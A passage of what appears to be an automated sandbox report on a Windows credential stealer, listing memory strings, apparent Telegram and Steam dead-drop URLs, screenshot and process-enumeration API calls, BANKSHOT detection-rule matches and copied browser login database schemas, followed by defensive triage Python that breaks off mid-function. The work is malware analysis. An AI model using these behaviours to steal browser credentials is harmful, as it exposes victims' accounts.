Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: HDGCFH.3.dr String found in binary or memory: https://support.mozilla.org
Source: HDGCFH.3.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDGCFH.3.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GNzbMA16ssY5
Source: file.exe, 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp, aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_e149f5d53c9263616797a13067f7a114fa287709b159d0a5
Source: aspnet_regiis.exe, 00000003.00000003.1968723157.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1968582689.0000000002DD9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2665588204.0000000028269000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1857214387.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662944978.00000000222FE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: aspnet_regiis.exe, 00000003.00000003.1819386724.0000000002E0B000.00000004.00000020.00020000.00000000.sdmp, BGIIEG.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002DC9000.00000004.00000020.00020000.00000000.sdmp, DBFIEH.3.dr String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.HCe2hc5EPKfq
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/FBFIEBGHJE
Source: HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.oX6J3D7V9Efv
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2658632872.000000001B92C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: aspnet_regiis.exe, 00000003.00000003.1983803798.0000000022283000.00000004.00000020.00020000.00000000.sdmp, HDGCFH.3.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000003.00000003.1732085170.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689035899.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2653530510.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1717962552.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1745657042.0000000002D4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1703411797.0000000002D4C000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1689075471.0000000002D88000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: aspnet_regiis.exe, 00000003.00000003.1674492337.0000000002D52000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 49.12.197.9:443 -> 192.168.2.9:49712 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A11F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_02A11F55

System Summary

Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Hidden Cobra BANKSHOT trojan Author: Florian Roth
Source: file.exe Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6D5BA4E0 GetModuleHandleW,NtQueryInformationProcess, 0_2_6D5BA4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A0145B GetCurrentProcess,NtQueryInformationProcess, 3_2_02A0145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CACB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB8C0 rand_s,NtQueryVirtualMemory, 3_2_6CACB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CACB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6CACB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CA6F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6CA6F280
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6D5CDB80 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6CAA94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 02A047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6CA9CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 02A10609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 02A104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: String function: 6CC909D0 appears 37 times
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000002.1421898994.000000000114E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000000.1407332677.0000000000C44000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameHusbandPlayerNathan778Kaitlyn.ePKZT vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.aspnet_regiis.exe.2a3f8e0.1.raw.unpack, type: UNPACKEDPE Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.aspnet_regiis.exe.2a3dcd8.2.raw.unpack, type: UNPACKEDPE Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: file.exe Static PE information: Section: JO_E58 ZLIB complexity 1.0003312317251463
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@5/26@1/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_6CAC7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 3_2_6CAC7030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 3_2_02A114A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_02A11807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,RtlAllocateHeap,wsprintfA,VariantClear, 3_2_02A11807
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Roaming\msvcp110.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp Jump to behavior
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: aspnet_regiis.exe, 00000003.00000002.2675094445.0000000040028000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000003.1834985106.0000000002E23000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.1811708596.0000000002DCD000.00000004.00000020.00020000.00000000.sdmp, JJKFBA.3.dr, CBKJEG.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: aspnet_regiis.exe, 00000003.00000002.2659303153.000000001BE1B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2662427008.0000000021D88000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: aspnet_regiis.exe, 00000003.00000002.2670689441.000000003414C000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
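The memory strings above come from two different places. The SQLite and key-store statements attributed to nss3.dll and softokn3.dll belong to the Mozilla NSS libraries the sample drops into C:\ProgramData (the pdb paths later in this report confirm mozglue.pdb, nss3.pdb, softokn3.pdb and freebl3.pdb), which a stealer needs to read Firefox's saved logins. The password_notes definition, by contrast, is read from JJKFBA and CBKJEG, files the sample wrote itself: that table references logins, which marks those files as copies of a Chromium "Login Data" database made by the FindFirstFileA/CopyFileA loops listed further down. The Python below is an added example, not part of the Joe Sandbox report or of Vidar, showing how an analyst triages such a dropped file offline: confirm the SQLite header, open the file immutable and read-only so no journal is written into evidence, and count the rows of the credential tables. The reduced logins layout and the other Chromium table names are assumptions about the victim browser, and the database it builds is constructed.

```python
"""Offline triage of a file a stealer copied out of a browser profile."""
import os
import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"     # the 16-byte header of every SQLite 3 database

# Tables that identify Chromium-family profile databases. password_notes is the
# definition recovered from the dropped files above; the remaining names are
# assumed from Chromium's usual schema and may need adjusting per browser version.
CREDENTIAL_TABLES = {
    "logins": "Login Data: saved passwords",
    "password_notes": "Login Data: notes attached to saved passwords",
    "cookies": "Cookies",
    "autofill": "Web Data: form history",
    "credit_cards": "Web Data: payment cards",
}

PASSWORD_NOTES_DDL = (   # verbatim from the memory strings of JJKFBA / CBKJEG above
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE "
    "DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
    "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key))"
)


def is_sqlite(path: str) -> bool:
    with open(path, "rb") as fh:
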